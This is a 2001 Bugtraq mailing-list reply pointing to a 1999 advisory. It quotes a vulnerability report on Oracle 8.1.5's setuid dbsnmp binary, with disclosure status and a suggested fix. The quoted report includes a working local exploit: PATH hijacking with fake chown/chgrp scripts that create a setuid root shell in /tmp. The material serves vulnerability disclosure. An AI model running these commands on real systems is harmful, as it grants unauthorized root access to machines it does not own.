Funny to see Oracle's canned response to this. I'm not 100% sure this is exactly the same problem, but I worked with them fixing what looks like the same problem back in 1999. They provided a patch way back then - might be that whoever respond to you is not "up to speed". See the advisory dated August 23, 1999 http://xforce.iss.net/alerts/advise36.php Aaron C. Newman CTO/Founder Application Security, Inc. 212-490-6022 anewman@appsecinc.com www.appsecinc.com -Protection Where It Counts- -----Original Message----- From: bugtraq-return-1460-aaron=newman-family.com@securityfocus.com [mailto:bugtraq-return-1460-aaron=newman-family.com@securityfocus.com]On Behalf Of Ismael Briones Sent: Wednesday, August 01, 2001 1:14 PM To: bugtraq@securityfocus.com Subject: Oracle 8.1.5 dbnsmp vulnerability Title: Vulnerability in dbsnmp in Oracle 8.1.5 Date: 01-08-2001 Platform: Only tested in Digital Unix. Impact: Any user can gain root privileges Author: Ismael Briones Vilar (ismael@el-mundo.net) Status: Vendor Contacted, and they are investigating a fix . PROBLEM SUMMARY: There is a problem in dbsnmp that can be used by local users to obtain root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there is a call to chown and chgrp, but without especify the path, so any user can define his PATH variable to exploit this vulnerability: Probed in Oracle 8.1.5. Oracle 8.1.6 is not vulnerable IMPACT: Any user with local access, can gain root privileges SOLUTION: Maybe a chmod -s STATUS: Vendor was contacted 30/07/2001 and Oracle answer: "We are investigating a fix as we speak." EXPLOIT: export PATH=~/bin/:$PATH Then we create the file ~/bin/chown or ~/bin/chgrp: #!/bin/sh cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX (We have to put all in the same line, separated by semicolon) We make our chown or chgrp executable: chmod +x ~/bin/chown chmod +x ~/bin/chgrp When the user execute dbsnmp, the system look for chown in the first directory of the PATH variable, execute our chown file and whe have a shell setuid root in /tmp/XXX. ------------------------- Ismael Briones Vilar ismael@el-mundo.net
